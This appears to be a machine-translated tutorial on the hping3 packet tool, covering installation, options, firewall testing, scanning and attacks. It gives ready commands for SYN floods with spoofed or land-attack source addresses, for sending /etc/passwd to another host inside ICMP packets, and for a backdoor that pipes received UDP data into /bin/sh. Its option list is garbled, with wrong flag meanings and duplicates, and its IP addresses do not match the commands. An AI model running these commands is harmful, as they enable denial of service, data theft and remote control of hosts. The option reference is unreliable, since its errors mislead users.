hping3

Test network and host security

Supplementary instructions

hping is an open source tool for generating and parsing TCPIP protocol packets. The creator is Salvatore Sanfilippo. The latest version is hping3, which supports using tcl scripts to automatically call its API. hping is a standard tool for security auditing, firewall testing and other tasks. The advantage of hping is that it can customize each part of the data packet, so users can flexibly detect the target machine in detail.

Install

yum install libpcap-devel tc-devel
ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
wget http://www.hping.org/hping3-20051105.tar.gz
tar zxvf hping3-20051105.tar.gz
cd hping3-20051105
./configure
make
make install

Options

-H --help Display help.
-v -VERSION version information.
-c --count count Countreached_timeout can be edited in hping2.h.
-i --interval packet sending interval (unit: milliseconds). The default time is 1 second. This function is very important in increasing the transmission rate. This function will also be used during idle/spoofing scanning. You can refer to hping- Howto gets more information -fast sends 10 packets per second.
-n -nmeric Numeric output, symbolic output host address.
-q -quiet Quit.
-I --interface interface name is nothing more than parameters such as eth0.
-v --verbose displays a lot of information, the TCP response is generally like: len=46 ip=192.168.1.1 flags=RADF seq=0 ttl=255 id=0 win=0 rtt=0.4ms tos=0 iplen=40 seq=0 ack=1380893504 sum=2010 urp=0
-D --debug Enter debug mode. When you encounter trouble, such as when using HPING and encounter something that is not what you are used to, you can use this mode to modify HPING, (INTERFACE DETECTION, DATA LINK LAYER ACCESS, INTERFACE SETTINGS,... ....)
-z --bind Use of shortcut keys.
-Z --unbind Eliminate shortcut keys.
-O --rawip RAWIP mode, in this mode HPING will send the IP header with data.
-1 --icmp ICMP mode. In this mode, HPING will send IGMP response messages. You can use the --ICMPTYPE --ICMPCODE option to send other types/modes of ICMP messages.
-2 --udp UDP mode. By default, HPING will send UDP packets to port 0 of the host. You can use the --baseport --destport --keep option to specify its mode.
-9 --listen signatuer hping's listen mode. In this mode, HPING will receive the specified data.
-a --spoof hostname Forge IP attack, the firewall will not record your real IP, and of course you will not be able to receive the response packet.
-t --ttl time to live can specify the TTL value of the outgoing package.
-H --ipproto Select IP protocol in RAW IP mode.
-w --WINID UNIX, WINDIWS's ID response is different, this option can make your ID response the same as WINDOWS.
-r --rel changes the ID and outputs the ID in decrement. See HPING-HOWTO for details.
-F --FRAG changes the FRAG of the package, which can test the other party's ability to handle package fragments. The default "virtual mtu" is 16 bytes.
-x --morefrag This function can send fragments to keep the host busy recovering fragments and cause a denial of service on the host.
-y -dontfrag Send unrecoverable IP fragments, which allows you to learn more about the MTU PATH DISCOVERY.
-G --fragoff fragment offset value set the fragment offset
-m --mtu mtu value After using this item, the ID value becomes very large, about 50000 when this item is not specified, it is about 3000-20000.
-G --rroute records routes, you can see detailed data, etc., up to 9 routes can be passed, even if the host blocks ICMP messages.
-C --ICMPTYPE type specifies the ICMP type. The default is ICMP echo REQUEST.
-K --ICMPCODE CODE Specifies the ICMP code, default 0.
--icmp-ipver Insert the IP version into the IP header as well.
--icmp-iphlen Set the length of the IP header, the default is 5 (32 bytes).
--icmp-iplen Set IP packet length.
--icmp-ipid Set the ID of the IP header of the ICMP message. The default is RANDOM.
--icmp-ipproto sets the protocol, the default is TCP.
-icmp-cksum Set checksum.
-icmp-ts alias for --icmptype 13 (to send ICMP timestamp requests)
--icmp-addr Alias for --icmptype 17 (to send ICMP address mask requests)
-s --baseport source port hping uses the source port to guess the response packet. It counts from a basic port. For each packet received, the port also increases by 1. You can define this rule yourself.
-p --deskport [+][+]desk port Set the target port. The default is 0. One plus sign is set to: after each request packet is sent, the port is increased by 1. Two plus signs is: each time a packet is sent. , add 1 to the port number.
--keep As mentioned above.
-w --win sends the same size as windows, 64BYTE.
-O --tcpoff Set fake tcp data offset. Normal data offset is tcphdrlen / 4.
-m --tcpseq Set the number of TCP sequences.
-l --tcpck Set TCP ack.
-Q --seqnum collects sequence numbers, which is very useful for analyzing TCP sequence numbers.

Hping3 function

Hping3 mainly has the following typical functional applications:

# Firewall test

Use Hping3 to specify various packet fields and conduct detailed tests on the firewall in turn. Please refer to: http://0daysecurity.com/articles/hping3_examples.html

Test the firewall's response to ICMP packets, whether it supports traceroute, whether to open a certain port, and conduct a denial of service attack (DoS attack) on the firewall. For example, test the target firewall in LandAttack mode (Land Attack sets the source address to be the same as the target address to induce the target machine to continuously establish connections with itself).

hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10

#Port scan

Hping3 can also scan target ports. Hping3 supports specifying various TCP flag bits, length and other information. The following example can be used to detect whether port 80 of the target machine is open:

hping3 -I eth0 -S 192.168.10.1 -p 80

Among them, -I eth0 specifies the use of eth0 port, -S specifies the flag bit SYN of the TCP packet, and -p 80 specifies the destination port of the detection.

hping3 supports a very rich range of port detection methods, and hping3 supports almost all of the scanning methods owned by nmap (except for the connect method, because Hping3 only sends and receives packets and does not maintain connections, so it does not support connect mode detection). Moreover, Hping3 can provide more precise control over the probes sent, making it easier for users to fine-tune detection results. Of course, Hping3's port scanning performance and comprehensive processing capabilities cannot be compared with Nmap. It is generally used to scan only a small number of ports on a small number of hosts.

#Idle scan

Idle scanning (Idle Scanning) is a method of anonymously scanning remote hosts. This method was also invented by Salvatore Sanfilippo, the author of Hping3. Currently, Idle scanning is also implemented in Nmap.

The scanning principle is: looking for an idle host (the host does not have any network traffic, and the IPID increases one by one). The attacking host first sends a detection packet to the idle host and obtains its IPID from the reply packet. Pretend to be the IP address of the idle host and send a SYN packet (assumed to be a SYN packet here) to the port of the remote host. If the destination port of the remote host is open, a SYN/ACK will be replied. At this time, after the idle host receives the SYN/ACK Reply to RST packet. Then the attacking host sends a detection packet to the idle host to obtain its IPID. Then by comparing the two IPID values, we can determine whether the remote host has replied to the data packet, and thus indirectly speculate on its port status.

# Denial of service attack

Using Hping3 can easily build a denial of service attack. For example, a large number of SYN connections are initiated to the target machine, the source address is forged to be 192.168.10.99, and each SYN packet is sent at an interval of 1000 microseconds.

hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u1000

Other attacks such as smurf, teardrop, land attack, etc. are also easy to construct.

# file transfer

Hping3 supports file transfer through TCP/UDP/ICMP and other packages. It is equivalent to establishing secret tunnel communication with the help of TCP/UDP/ICMP packets. The implementation is to open the listening port and parse the content of the detected signature (the signature is a user-specified string) accordingly. Start the service on the receiving end:

hping3 192.168.1.159--listen signature --safe --icmp

Monitor the signature in the ICMP packet and parse the file content based on the signature.

Use signed ICMP packets to send files on the sending end:

hping3 192.168.1.108--icmp ?d 100 --sign signature --file /etc/passwd

Pass the /etc/passwd password file to the 192.168.10.44 host through ICMP packets. The sending packet size is 100 bytes (-d 100), and the sending signature is signature (-sign signature).

# Trojan function

If Hping3 can be started on the remote host, it can start the listening port as a Trojan and open shell communication after the connection is established. Similar to netcat's backdoor function.

Example: Open UDP port No. 53 (DNS resolution service) locally to listen for data packets containing signatures from the 192.168.10.66 host, and call /bin/sh to execute the received data.

On the Trojan launcher:

hping3 192.168.10.66--listen signature --safe --udp -p 53 | /bin/sh

On the remote control:

echo ls >test.cmd
hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd

Send the file containing the ls command plus the signature to UDP port 53 of the 192.168.10.44 host. The packet data length is 100 bytes.

Of course, this is just a simple demonstration program. In real scenarios, the control end can use the shell to perform many advanced and complex operations.